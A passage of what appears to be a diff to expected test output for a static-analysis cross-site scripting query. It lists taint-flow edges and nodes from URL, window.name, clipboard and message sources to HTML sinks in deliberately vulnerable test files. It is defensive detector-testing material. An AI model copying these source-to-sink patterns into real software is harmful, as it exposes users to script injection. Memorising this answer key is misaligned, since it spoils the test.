tst.js:471:13:471:36 | documen ... .search | tst.js:471:13:471:46 | documen ... bstr(1) | provenance | Config | -| tst.js:471:13:471:46 | documen ... bstr(1) | tst.js:471:7:471:46 | url | provenance | | -| tst.js:491:23:491:35 | location.hash | tst.js:491:23:491:45 | locatio ... bstr(1) | provenance | Config | -| tst.js:494:18:494:30 | location.hash | tst.js:494:18:494:40 | locatio ... bstr(1) | provenance | Config | -| tst.js:501:43:501:62 | window.location.hash | tst.js:501:33:501:63 | decodeU ... n.hash) | provenance | | -| tst.js:508:7:508:39 | target | tst.js:509:18:509:23 | target | provenance | | -| tst.js:508:16:508:39 | documen ... .search | tst.js:508:7:508:39 | target | provenance | | -| tst.js:509:18:509:23 | target | tst.js:509:18:509:54 | target. ... "), '') | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | | +| tst.js:6:37:6:58 | documen ... on.href | tst.js:6:37:6:114 | documen ... t=")+8) | provenance | Config | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | | +| tst.js:6:37:6:114 | documen ... t=")+8) | tst.js:6:18:6:126 | "" | provenance | Config | +| tst.js:9:28:9:33 | target | tst.js:9:5:9:42 | '
    ' | provenance | Config | +| tst.js:14:7:14:56 | params | tst.js:15:18:15:23 | params | provenance | | +| tst.js:14:7:14:56 | params [MapValue] | tst.js:15:18:15:23 | params [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | provenance | | +| tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | tst.js:14:16:14:56 | (new UR ... hParams | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams | tst.js:14:7:14:56 | params | provenance | | +| tst.js:14:16:14:56 | (new UR ... hParams [MapValue] | tst.js:14:7:14:56 | params [MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams, MapValue] | provenance | | +| tst.js:14:17:14:42 | new URL ... cation) [searchParams] | tst.js:14:16:14:43 | (new UR ... ation)) [searchParams] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:14:25:14:41 | document.location | tst.js:14:17:14:42 | new URL ... cation) [searchParams] | provenance | | +| tst.js:15:18:15:23 | params | tst.js:15:18:15:35 | params.get('name') | provenance | Config | +| tst.js:15:18:15:23 | params [MapValue] | tst.js:15:18:15:35 | params.get('name') | provenance | | +| tst.js:17:7:17:61 | searchParams | tst.js:18:18:18:29 | searchParams | provenance | | +| tst.js:17:7:17:61 | searchParams [MapValue] | tst.js:18:18:18:29 | searchParams [MapValue] | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) | tst.js:17:7:17:61 | searchParams | provenance | | +| tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | tst.js:17:7:17:61 | searchParams [MapValue] | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:47 | target | tst.js:17:42:17:60 | target.substring(1) | provenance | Config | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:17:42:17:60 | target.substring(1) | tst.js:17:22:17:61 | new URL ... ing(1)) [MapValue] | provenance | | +| tst.js:18:18:18:29 | searchParams | tst.js:18:18:18:41 | searchP ... 'name') | provenance | Config | +| tst.js:18:18:18:29 | searchParams [MapValue] | tst.js:18:18:18:41 | searchP ... 'name') | provenance | | +| tst.js:21:14:21:19 | target | tst.js:22:18:22:23 | target | provenance | | +| tst.js:24:5:24:28 | documen ... .search | tst.js:21:14:21:19 | target | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:29:16:29:20 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:48:26:48:30 | bar() | provenance | | +| tst.js:27:10:27:33 | documen ... .search | tst.js:56:16:56:20 | bar() | provenance | | +| tst.js:31:14:31:14 | x | tst.js:32:10:32:10 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:31:14:31:14 | x | provenance | | +| tst.js:34:20:34:43 | documen ... .search | tst.js:34:16:34:44 | baz(doc ... search) | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:36:15:36:15 | s | tst.js:37:20:37:20 | s | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | | +| tst.js:37:20:37:20 | s | tst.js:37:10:37:31 | "
    " ...
    " | provenance | Config | +| tst.js:39:21:39:44 | documen ... .search | tst.js:36:15:36:15 | s | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | | +| tst.js:39:21:39:44 | documen ... .search | tst.js:39:16:39:45 | wrap(do ... search) | provenance | Config | +| tst.js:41:15:41:15 | s | tst.js:43:12:43:12 | s | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:43:12:43:12 | s | tst.js:43:12:43:22 | s.substr(1) | provenance | Config | +| tst.js:46:21:46:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | | +| tst.js:46:21:46:44 | documen ... .search | tst.js:46:16:46:45 | chop(do ... search) | provenance | Config | +| tst.js:47:21:47:44 | documen ... .search | tst.js:41:15:41:15 | s | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | | +| tst.js:47:21:47:44 | documen ... .search | tst.js:47:16:47:45 | chop(do ... search) | provenance | Config | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:36:15:36:15 | s | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | | +| tst.js:48:21:48:31 | chop(bar()) | tst.js:48:16:48:32 | wrap(chop(bar())) | provenance | Config | +| tst.js:48:26:48:30 | bar() | tst.js:41:15:41:15 | s | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | | +| tst.js:48:26:48:30 | bar() | tst.js:48:21:48:31 | chop(bar()) | provenance | Config | +| tst.js:50:34:50:34 | s | tst.js:51:18:51:18 | s | provenance | | +| tst.js:53:25:53:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:54:25:54:48 | documen ... .search | tst.js:50:34:50:34 | s | provenance | | +| tst.js:58:1:58:27 | [,docum ... search] [1] | tst.js:58:46:58:46 | x | provenance | | +| tst.js:58:3:58:26 | documen ... .search | tst.js:58:1:58:27 | [,docum ... search] [1] | provenance | | +| tst.js:58:46:58:46 | x | tst.js:60:20:60:20 | x | provenance | | +| tst.js:93:7:93:44 | v | tst.js:95:18:95:18 | v | provenance | | +| tst.js:93:7:93:44 | v | tst.js:120:18:120:18 | v | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | | +| tst.js:93:11:93:34 | documen ... .search | tst.js:93:11:93:44 | documen ... bstr(1) | provenance | Config | +| tst.js:93:11:93:44 | documen ... bstr(1) | tst.js:93:7:93:44 | v | provenance | | +| tst.js:132:29:132:50 | window. ... .search | tst.js:135:29:135:29 | v | provenance | | +| tst.js:135:29:135:29 | v | tst.js:135:49:135:49 | v | provenance | | +| tst.js:142:40:142:61 | window. ... .search | tst.js:139:29:139:46 | xssSourceService() | provenance | | +| tst.js:161:9:161:41 | target | tst.js:164:28:164:33 | target | provenance | | +| tst.js:161:18:161:41 | documen ... .search | tst.js:161:9:161:41 | target | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:170:31:170:37 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:172:42:172:48 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:173:33:173:39 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:175:54:175:60 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:176:45:176:51 | tainted | provenance | | +| tst.js:168:9:168:42 | tainted | tst.js:177:49:177:55 | tainted | provenance | | +| tst.js:168:19:168:42 | documen ... .search | tst.js:168:9:168:42 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:183:67:183:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:181:9:181:42 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:181:19:181:42 | documen ... .search | tst.js:181:9:181:42 | tainted | provenance | | +| tst.js:183:67:183:73 | tainted | tst.js:184:67:184:73 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:188:35:188:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:190:46:190:52 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:191:38:191:44 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:192:35:192:41 | tainted | provenance | | +| tst.js:184:67:184:73 | tainted | tst.js:220:35:220:41 | tainted | provenance | | +| tst.js:188:35:188:41 | tainted | tst.js:196:28:196:46 | this.state.tainted1 | provenance | | +| tst.js:190:46:190:52 | tainted | tst.js:197:28:197:46 | this.state.tainted2 | provenance | | +| tst.js:191:38:191:44 | tainted | tst.js:198:28:198:46 | this.state.tainted3 | provenance | | +| tst.js:192:35:192:41 | tainted | tst.js:202:32:202:49 | prevState.tainted4 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:209:28:209:46 | this.props.tainted1 | provenance | | +| tst.js:220:35:220:41 | tainted | tst.js:222:20:222:26 | tainted | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:210:28:210:46 | this.props.tainted2 | provenance | | +| tst.js:222:20:222:26 | tainted | tst.js:224:23:224:29 | tainted | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:211:28:211:46 | this.props.tainted3 | provenance | | +| tst.js:224:23:224:29 | tainted | tst.js:225:23:225:29 | tainted | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:215:32:215:49 | prevProps.tainted4 | provenance | | +| tst.js:225:23:225:29 | tainted | tst.js:239:23:239:29 | tainted | provenance | | +| tst.js:231:39:231:55 | props.propTainted | tst.js:235:60:235:82 | this.st ... Tainted | provenance | | +| tst.js:239:23:239:29 | tainted | tst.js:231:39:231:55 | props.propTainted | provenance | | +| tst.js:269:9:269:29 | tainted | tst.js:272:59:272:65 | tainted | provenance | | +| tst.js:269:19:269:29 | window.name | tst.js:269:9:269:29 | tainted | provenance | | +| tst.js:285:9:285:16 | location | tst.js:286:10:286:10 | e | provenance | | +| tst.js:286:10:286:10 | e | tst.js:287:20:287:20 | e | provenance | | +| tst.js:292:10:292:17 | location | tst.js:294:10:294:10 | e | provenance | | +| tst.js:294:10:294:10 | e | tst.js:295:20:295:20 | e | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | provenance | | +| tst.js:311:10:311:35 | new URL ... cation) [searchParams] | tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams, MapValue] | provenance | | +| tst.js:311:18:311:34 | document.location | tst.js:311:10:311:35 | new URL ... cation) [searchParams] | provenance | | +| tst.js:315:7:315:43 | params | tst.js:316:18:316:23 | params | provenance | | +| tst.js:315:7:315:43 | params [MapValue] | tst.js:316:18:316:23 | params [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams, MapValue] | tst.js:315:16:315:43 | getTain ... hParams [MapValue] | provenance | | +| tst.js:315:16:315:30 | getTaintedUrl() [searchParams] | tst.js:315:16:315:43 | getTain ... hParams | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams | tst.js:315:7:315:43 | params | provenance | | +| tst.js:315:16:315:43 | getTain ... hParams [MapValue] | tst.js:315:7:315:43 | params [MapValue] | provenance | | +| tst.js:316:18:316:23 | params | tst.js:316:18:316:35 | params.get('name') | provenance | Config | +| tst.js:316:18:316:23 | params [MapValue] | tst.js:316:18:316:35 | params.get('name') | provenance | | +| tst.js:325:12:325:37 | new URL ... cation) [hash] | tst.js:327:5:327:12 | getUrl() [hash] | provenance | | +| tst.js:325:20:325:36 | document.location | tst.js:325:12:325:37 | new URL ... cation) [hash] | provenance | | +| tst.js:327:5:327:12 | getUrl() [hash] | tst.js:327:5:327:17 | getUrl().hash | provenance | | +| tst.js:327:5:327:17 | getUrl().hash | tst.js:327:5:327:30 | getUrl( ... ring(1) | provenance | Config | +| tst.js:332:7:332:39 | target | tst.js:333:12:333:17 | target | provenance | | +| tst.js:332:16:332:39 | documen ... .search | tst.js:332:7:332:39 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:340:16:340:21 | target | provenance | | +| tst.js:339:10:339:42 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:339:19:339:42 | documen ... .search | tst.js:339:10:339:42 | target | provenance | | +| tst.js:340:16:340:21 | target | tst.js:341:20:341:25 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:344:21:344:26 | target | provenance | | +| tst.js:341:20:341:25 | target | tst.js:347:18:347:23 | target | provenance | | +| tst.js:355:7:355:39 | target | tst.js:357:18:357:23 | target | provenance | | +| tst.js:355:16:355:39 | documen ... .search | tst.js:355:7:355:39 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:367:18:367:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:369:18:369:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:380:18:380:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:389:18:389:23 | target | provenance | | +| tst.js:364:7:364:39 | target | tst.js:391:19:391:24 | target | provenance | | +| tst.js:364:16:364:39 | documen ... .search | tst.js:364:7:364:39 | target | provenance | | +| tst.js:369:18:369:23 | target | tst.js:369:18:369:29 | target.taint | provenance | | +| tst.js:374:3:374:8 | [post update] target [taint3] | tst.js:375:18:375:23 | target [taint3] | provenance | | +| tst.js:374:19:374:42 | documen ... .search | tst.js:374:3:374:8 | [post update] target [taint3] | provenance | | +| tst.js:375:18:375:23 | target [taint3] | tst.js:375:18:375:30 | target.taint3 | provenance | | +| tst.js:380:18:380:23 | target | tst.js:380:18:380:30 | target.taint5 | provenance | | +| tst.js:389:18:389:23 | target | tst.js:389:18:389:30 | target.taint7 | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:391:19:391:24 | target [taint8] | provenance | | +| tst.js:391:3:391:8 | [post update] target [taint8] | tst.js:392:18:392:23 | target [taint8] | provenance | | +| tst.js:391:19:391:24 | target | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:24 | target [taint8] | tst.js:391:19:391:31 | target.taint8 | provenance | | +| tst.js:391:19:391:31 | target.taint8 | tst.js:391:3:391:8 | [post update] target [taint8] | provenance | | +| tst.js:392:18:392:23 | target [taint8] | tst.js:392:18:392:30 | target.taint8 | provenance | | +| tst.js:399:7:399:46 | payload | tst.js:400:18:400:24 | payload | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | | +| tst.js:399:17:399:36 | window.location.hash | tst.js:399:17:399:46 | window. ... bstr(1) | provenance | Config | +| tst.js:399:17:399:46 | window. ... bstr(1) | tst.js:399:7:399:46 | payload | provenance | | +| tst.js:402:7:402:55 | match | tst.js:404:20:404:24 | match | provenance | | +| tst.js:402:15:402:34 | window.location.hash | tst.js:402:15:402:55 | window. ... (\\w+)/) | provenance | | +| tst.js:402:15:402:55 | window. ... (\\w+)/) | tst.js:402:7:402:55 | match | provenance | | +| tst.js:404:20:404:24 | match | tst.js:404:20:404:27 | match[1] | provenance | | +| tst.js:407:18:407:37 | window.location.hash | tst.js:407:18:407:48 | window. ... it('#') [1] | provenance | Config | +| tst.js:407:18:407:48 | window. ... it('#') [1] | tst.js:407:18:407:51 | window. ... '#')[1] | provenance | | +| tst.js:411:7:411:39 | target | tst.js:413:18:413:23 | target | provenance | | +| tst.js:411:16:411:39 | documen ... .search | tst.js:411:7:411:39 | target | provenance | | +| tst.js:413:18:413:23 | target | tst.js:413:18:413:89 | target. ... data>') | provenance | | +| tst.js:419:6:419:38 | source | tst.js:423:28:423:33 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:424:33:424:38 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:425:34:425:39 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:426:41:426:46 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:427:44:427:49 | source | provenance | | +| tst.js:419:6:419:38 | source | tst.js:428:32:428:37 | source | provenance | | +| tst.js:419:15:419:38 | documen ... .search | tst.js:419:6:419:38 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:438:18:438:23 | source | provenance | | +| tst.js:436:7:436:39 | source | tst.js:439:36:439:41 | source | provenance | | +| tst.js:436:16:436:39 | documen ... .search | tst.js:436:7:436:39 | source | provenance | | +| tst.js:439:36:439:41 | source | tst.js:439:18:439:42 | ansiToH ... source) | provenance | | +| tst.js:443:6:443:38 | source | tst.js:446:21:446:26 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:448:19:448:24 | source | provenance | | +| tst.js:443:6:443:38 | source | tst.js:450:20:450:25 | source | provenance | | +| tst.js:443:15:443:38 | documen ... .search | tst.js:443:6:443:38 | source | provenance | | +| tst.js:454:7:454:46 | url | tst.js:456:19:456:21 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:457:26:457:28 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:458:25:458:27 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:459:20:459:22 | url | provenance | | +| tst.js:454:7:454:46 | url | tst.js:469:22:469:24 | url | provenance | | +| tst.js:454:13:454:36 | documen ... .search | tst.js:454:13:454:46 | documen ... bstr(1) | provenance | Config | +| tst.js:454:13:454:46 | documen ... bstr(1) | tst.js:454:7:454:46 | url | provenance | | +| tst.js:474:23:474:35 | location.hash | tst.js:474:23:474:45 | locatio ... bstr(1) | provenance | Config | +| tst.js:477:18:477:30 | location.hash | tst.js:477:18:477:40 | locatio ... bstr(1) | provenance | Config | +| tst.js:484:43:484:62 | window.location.hash | tst.js:484:33:484:63 | decodeU ... n.hash) | provenance | | +| tst.js:491:7:491:39 | target | tst.js:492:18:492:23 | target | provenance | | +| tst.js:491:16:491:39 | documen ... .search | tst.js:491:7:491:39 | target | provenance | | +| tst.js:492:18:492:23 | target | tst.js:492:18:492:54 | target. ... "), '') | provenance | | +| tst.js:498:7:498:26 | source | tst.js:499:27:499:32 | source | provenance | | +| tst.js:498:16:498:26 | window.name | tst.js:498:7:498:26 | source | provenance | | +| tst.js:499:27:499:32 | source | tst.js:499:18:499:33 | unescape(source) | provenance | | | typeahead.js:20:13:20:45 | target | typeahead.js:21:12:21:17 | target | provenance | | | typeahead.js:20:22:20:45 | documen ... .search | typeahead.js:20:13:20:45 | target | provenance | | | typeahead.js:21:12:21:17 | target | typeahead.js:24:30:24:32 | val | provenance | | | typeahead.js:24:30:24:32 | val | typeahead.js:25:18:25:20 | val | provenance | | +| v-html.vue:6:42:6:58 | document.location | v-html.vue:2:8:2:23 | v-html=tainted | provenance | | | various-concat-obfuscations.js:2:6:2:39 | tainted | various-concat-obfuscations.js:4:14:4:20 | tainted | provenance | | | various-concat-obfuscations.js:2:6:2:39 | tainted | various-concat-obfuscations.js:5:12:5:18 | tainted | provenance | | | various-concat-obfuscations.js:2:6:2:39 | tainted | various-concat-obfuscations.js:6:19:6:25 | tainted | provenance | | @@ -1207,261 +797,683 @@ edges | winjs.js:2:17:2:40 | documen ... .search | winjs.js:2:17:2:53 | documen ... ring(1) | provenance | | | winjs.js:2:17:2:40 | documen ... .search | winjs.js:2:17:2:53 | documen ... ring(1) | provenance | Config | | winjs.js:2:17:2:53 | documen ... ring(1) | winjs.js:2:7:2:53 | tainted | provenance | | +nodes +| addEventListener.js:1:43:1:47 | event | semmle.label | event | +| addEventListener.js:2:20:2:24 | event | semmle.label | event | +| addEventListener.js:2:20:2:29 | event.data | semmle.label | event.data | +| addEventListener.js:5:43:5:48 | data | semmle.label | data | +| addEventListener.js:5:43:5:48 | {data} | semmle.label | {data} | +| addEventListener.js:6:20:6:23 | data | semmle.label | data | +| addEventListener.js:10:21:10:25 | event | semmle.label | event | +| addEventListener.js:12:24:12:28 | event | semmle.label | event | +| addEventListener.js:12:24:12:33 | event.data | semmle.label | event.data | +| angular2-client.ts:24:44:24:71 | \\u0275getDOM ... ().href | semmle.label | \\u0275getDOM ... ().href | +| angular2-client.ts:26:44:26:69 | this.ro ... .params | semmle.label | this.ro ... .params | +| angular2-client.ts:26:44:26:73 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:27:44:27:74 | this.ro ... yParams | semmle.label | this.ro ... yParams | +| angular2-client.ts:27:44:27:78 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:28:44:28:71 | this.ro ... ragment | semmle.label | this.ro ... ragment | +| angular2-client.ts:29:44:29:82 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | +| angular2-client.ts:30:44:30:87 | this.ro ... ('foo') | semmle.label | this.ro ... ('foo') | +| angular2-client.ts:32:46:32:59 | map.get('foo') | semmle.label | map.get('foo') | +| angular2-client.ts:35:44:35:74 | this.ro ... 1].path | semmle.label | this.ro ... 1].path | +| angular2-client.ts:36:44:36:80 | this.ro ... ameters | semmle.label | this.ro ... ameters | +| angular2-client.ts:36:44:36:82 | this.ro ... eters.x | semmle.label | this.ro ... eters.x | +| angular2-client.ts:37:44:37:91 | this.ro ... et('x') | semmle.label | this.ro ... et('x') | +| angular2-client.ts:38:44:38:89 | this.ro ... .params | semmle.label | this.ro ... .params | +| angular2-client.ts:38:44:38:91 | this.ro ... arams.x | semmle.label | this.ro ... arams.x | +| angular2-client.ts:40:44:40:58 | this.router.url | semmle.label | this.router.url | +| angular2-client.ts:42:45:42:59 | this.router.url | semmle.label | this.router.url | +| angular2-client.ts:43:75:43:105 | this.ro ... yParams | semmle.label | this.ro ... yParams | +| angular2-client.ts:43:75:43:109 | this.ro ... ams.foo | semmle.label | this.ro ... ams.foo | +| angular2-client.ts:47:44:47:76 | routeSn ... ('foo') | semmle.label | routeSn ... ('foo') | +| angular-tempate-url.js:9:26:9:45 | Cookie.get("unsafe") | semmle.label | Cookie.get("unsafe") | +| angular-tempate-url.js:13:30:13:31 | ev | semmle.label | ev | +| angular-tempate-url.js:14:26:14:27 | ev | semmle.label | ev | +| angular-tempate-url.js:14:26:14:32 | ev.data | semmle.label | ev.data | +| classnames.js:7:31:7:84 | `` | semmle.label | `` | +| classnames.js:7:47:7:69 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:7:58:7:68 | window.name | semmle.label | window.name | +| classnames.js:8:31:8:85 | `` | semmle.label | `` | +| classnames.js:8:47:8:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:8:59:8:69 | window.name | semmle.label | window.name | +| classnames.js:9:31:9:85 | `` | semmle.label | `` | +| classnames.js:9:47:9:70 | classNa ... w.name) | semmle.label | classNa ... w.name) | +| classnames.js:9:59:9:69 | window.name | semmle.label | window.name | +| classnames.js:10:45:10:55 | window.name | semmle.label | window.name | +| classnames.js:11:31:11:79 | `` | semmle.label | `` | +| classnames.js:11:47:11:64 | unsafeStyle('foo') | semmle.label | unsafeStyle('foo') | +| classnames.js:13:31:13:83 | `` | semmle.label | `` | +| classnames.js:13:47:13:68 | safeSty ... w.name) | semmle.label | safeSty ... w.name) | +| classnames.js:13:57:13:67 | window.name | semmle.label | window.name | +| classnames.js:15:31:15:78 | `` | semmle.label | `` | +| classnames.js:15:47:15:63 | clsx(window.name) | semmle.label | clsx(window.name) | +| classnames.js:15:52:15:62 | window.name | semmle.label | window.name | +| classnames.js:17:32:17:79 | `` | semmle.label | `` | +| classnames.js:17:48:17:64 | clsx(window.name) | semmle.label | clsx(window.name) | +| classnames.js:17:53:17:63 | window.name | semmle.label | window.name | +| clipboard.ts:8:11:8:51 | html | semmle.label | html | +| clipboard.ts:8:18:8:51 | clipboa ... /html') | semmle.label | clipboa ... /html') | +| clipboard.ts:15:25:15:28 | html | semmle.label | html | +| clipboard.ts:24:23:24:58 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:29:19:29:54 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:33:19:33:68 | e.origi ... /html') | semmle.label | e.origi ... /html') | +| clipboard.ts:43:15:43:55 | html | semmle.label | html | +| clipboard.ts:43:22:43:55 | clipboa ... /html') | semmle.label | clipboa ... /html') | +| clipboard.ts:50:29:50:32 | html | semmle.label | html | +| clipboard.ts:71:13:71:62 | droppedHtml | semmle.label | droppedHtml | +| clipboard.ts:71:27:71:62 | e.clipb ... /html') | semmle.label | e.clipb ... /html') | +| clipboard.ts:73:29:73:39 | droppedHtml | semmle.label | droppedHtml | +| clipboard.ts:98:15:98:54 | html | semmle.label | html | +| clipboard.ts:98:22:98:54 | dataTra ... /html') | semmle.label | dataTra ... /html') | +| clipboard.ts:99:23:99:26 | html | semmle.label | html | +| custom-element.js:5:26:5:36 | window.name | semmle.label | window.name | +| d3.js:4:12:4:22 | window.name | semmle.label | window.name | +| d3.js:11:15:11:24 | getTaint() | semmle.label | getTaint() | +| d3.js:12:20:12:29 | getTaint() | semmle.label | getTaint() | +| d3.js:14:20:14:29 | getTaint() | semmle.label | getTaint() | +| d3.js:21:15:21:24 | getTaint() | semmle.label | getTaint() | +| dates.js:9:9:9:69 | taint | semmle.label | taint | +| dates.js:9:17:9:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:9:36:9:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:9:36:9:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:11:31:11:70 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:11:42:11:68 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:11:63:11:67 | taint | semmle.label | taint | +| dates.js:12:31:12:73 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:12:42:12:71 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:12:66:12:70 | taint | semmle.label | taint | +| dates.js:13:31:13:72 | `Time i ... time)}` | semmle.label | `Time i ... time)}` | +| dates.js:13:42:13:70 | dateFns ... )(time) | semmle.label | dateFns ... )(time) | +| dates.js:13:59:13:63 | taint | semmle.label | taint | +| dates.js:16:31:16:69 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:16:42:16:67 | moment( ... (taint) | semmle.label | moment( ... (taint) | +| dates.js:16:62:16:66 | taint | semmle.label | taint | +| dates.js:18:31:18:66 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:18:42:18:64 | datefor ... taint) | semmle.label | datefor ... taint) | +| dates.js:18:59:18:63 | taint | semmle.label | taint | +| dates.js:21:31:21:68 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:21:42:21:66 | dayjs(t ... (taint) | semmle.label | dayjs(t ... (taint) | +| dates.js:21:61:21:65 | taint | semmle.label | taint | +| dates.js:30:9:30:69 | taint | semmle.label | taint | +| dates.js:30:17:30:69 | decodeU ... ing(1)) | semmle.label | decodeU ... ing(1)) | +| dates.js:30:36:30:55 | window.location.hash | semmle.label | window.location.hash | +| dates.js:30:36:30:68 | window. ... ring(1) | semmle.label | window. ... ring(1) | +| dates.js:37:31:37:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:37:42:37:82 | dateFns ... taint) | semmle.label | dateFns ... taint) | +| dates.js:37:77:37:81 | taint | semmle.label | taint | +| dates.js:38:31:38:84 | `Time i ... aint)}` | semmle.label | `Time i ... aint)}` | +| dates.js:38:42:38:82 | luxon.f ... taint) | semmle.label | luxon.f ... taint) | +| dates.js:38:77:38:81 | taint | semmle.label | taint | +| dates.js:39:31:39:86 | `Time i ... aint)}` | 